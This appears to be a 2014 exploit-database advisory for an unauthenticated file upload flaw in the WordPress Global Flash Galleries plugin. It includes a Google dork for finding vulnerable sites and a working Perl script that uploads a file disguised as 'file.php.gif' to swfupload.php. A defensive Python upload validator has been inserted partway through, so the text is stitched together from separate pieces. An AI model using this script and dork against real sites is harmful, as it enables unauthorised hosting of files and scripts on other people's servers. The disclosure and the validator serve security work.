WordPress Global Flash Galleries plugin suffers from an arbitrary file upload vulnerability. Note that this finding houses site-specific data.
2dd83399faca3e5d1e36f0966e5019a64279821bcb41fc8ebfee2cd41cd4b56f
###############################################################
# Exploit Title: WordPress global-flash-galleries Plugin Remote File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 01/18/2014
# Vendor Homepage: http://wordpress.org
# Software Link : http://downloads.wordpress.org/plugin/global-flash-galleries.zip
# Google dork: inurl:/wp-content/plugins/global-flash-galleries/
# Tested on: Windows/Linux
###############################################################
# Description :
Global Flash Galleries allows file uploads by unauthenticated users. The filters in
place only permit uploads of image files (extensions .gif, .png and .jpg).
This avoids script execution problems, but an attacker could still use the
affected system to host arbitrary files.
The vulnerability occurs due to inappropriate cookie validation in:
/global-flash-galleries/swfupload.php
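The weakness described above is an extension-only filter on an endpoint that does not verify the caller. As an added defensive example (not code from the advisory or the plugin), the validator below accepts a single allow-listed extension, rejects secondary extensions such as "file.php.gif", and checks that the file's leading bytes match the declared image type; in WordPress the caller check that belongs in front of it is current_user_can('upload_files') plus nonce verification.

```python
import os
import re

# Magic bytes for the three image types the plugin's filter allows.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Constructed rule: a storage name is a short run of safe characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, detail). On success, detail is the sanitized
    storage name; on failure, detail says why the upload was refused."""
    # Drop any directory component so "../x.png" cannot escape the upload dir.
    base = os.path.basename(filename)
    parts = base.split(".")
    # Exactly one extension: "file.php.gif" has two and is refused here.
    if len(parts) != 2:
        return False, "filename must be <name>.<ext> with exactly one extension"
    name, ext = parts[0], parts[1].lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not SAFE_NAME.match(name):
        return False, "filename contains disallowed characters"
    # The extension alone proves nothing; the content must look like the type.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content does not look like a .{ext} image"
    return True, f"{name}.{ext}"


if __name__ == "__main__":
    # Constructed samples: a real GIF header and a script disguised by name.
    print(validate_upload("photo.gif", b"GIF89a\x01\x00\x01\x00"))
    print(validate_upload("file.php.gif", b"GIF89a\x01\x00\x01\x00"))
    print(validate_upload("shell.gif", b"<?php echo 1; ?>"))
```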
# Exploit :
= = = = = = = = =
[Perl]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

# Usage: script.pl <swfupload.php URL> <local file to send>
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();

# Note: $name is never assigned in the original script, so the "name"
# field is sent empty.
my $req = POST $url,
    Content_Type => 'form-data',
    Content      => [
        name          => $name,
        galleryselect => 1,    # Gallery ID (popup.php)
        Filedata      => [ "$file", "file.php.gif", Content_Type => 'image/gif' ],
    ];

my $res = $ua->request($req);
if ( $res->is_success ) {
    print $res->content;
}
else {
    print $res->status_line, "\n";
}
[Perl]
# Exploit demo :
= = = = = = = = =
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #